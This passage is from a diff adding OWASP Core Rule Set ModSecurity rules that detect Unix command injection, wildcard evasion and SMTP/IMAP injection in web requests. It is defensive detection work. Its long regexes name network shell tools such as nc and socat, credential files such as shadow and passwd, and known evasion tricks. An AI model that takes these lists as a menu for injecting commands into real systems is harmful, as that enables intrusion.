+ msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
+
+# [ Unix command injection ]
+#
+# This rule targets pefix + commans that are prone to false positive detection at PL3.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932232.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932232 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\
*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \ + "id:932232,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - 
words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932237.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932237 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:(?:itude)?[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|
p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(
?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:[\s\v&\)<>c\|]|h(?:o(?:[\s\v&\)<>\|]|ami|is)?|iptail[\s\v&\)<>\|])|a(?:ll|tch)[\s\v&\)<>\|]|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?
:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))(?:\b|[^0-9A-Z_a-z])" \ + "id:932237,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - 
with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932238.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932238 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]
*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))" \ + "id:932238,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. 
+#
+# In some other cases, it could be bypassed even if the Paranoia Level is set to 3.
+# Please, keep in mind that this rule could lead to many false positives.
+#
+# The following two blog posts explain the evasions this rule is designed to detect:
+# - https://medium.com/secjuice/waf-evasion-techniques-718026d693d8
+# - https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
+
+SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \
+ "id:932190,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:urlDecodeUni,t:normalizePath,t:cmdLine,\
+ msg:'Remote Command Execution: Wildcard bypass technique attempt',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ tag:'paranoia-level/3',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+
+# -=[ SMTP commands ]=-
+#
+# This rule prevents execution of SMTP related system commands.
+#
+# These commands may have a higher risk of false positives.
+# For explanation of this rule, see above rule 932300.
+#
+# Rule 932301 is a stricter sibling of rule 932300.
+#
+# Regular expression generated from regex-assembly/932301.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932301 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:DATA|QUIT|HELP(?: .{1,255})?)" \ + "id:932301,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ IMAP4 Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932310. +# +# Rule 932311 is a stricter sibling of rule 932310. +# +# Regular expression generated from regex-assembly/932311.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932311 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:C(?:(?:REATE|OPY [\*,0-:]+) [\"-#%-&\*\--9A-Z\x5c_a-z]+|APABILITY|HECK|LOSE)|DELETE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|EX(?:AMINE 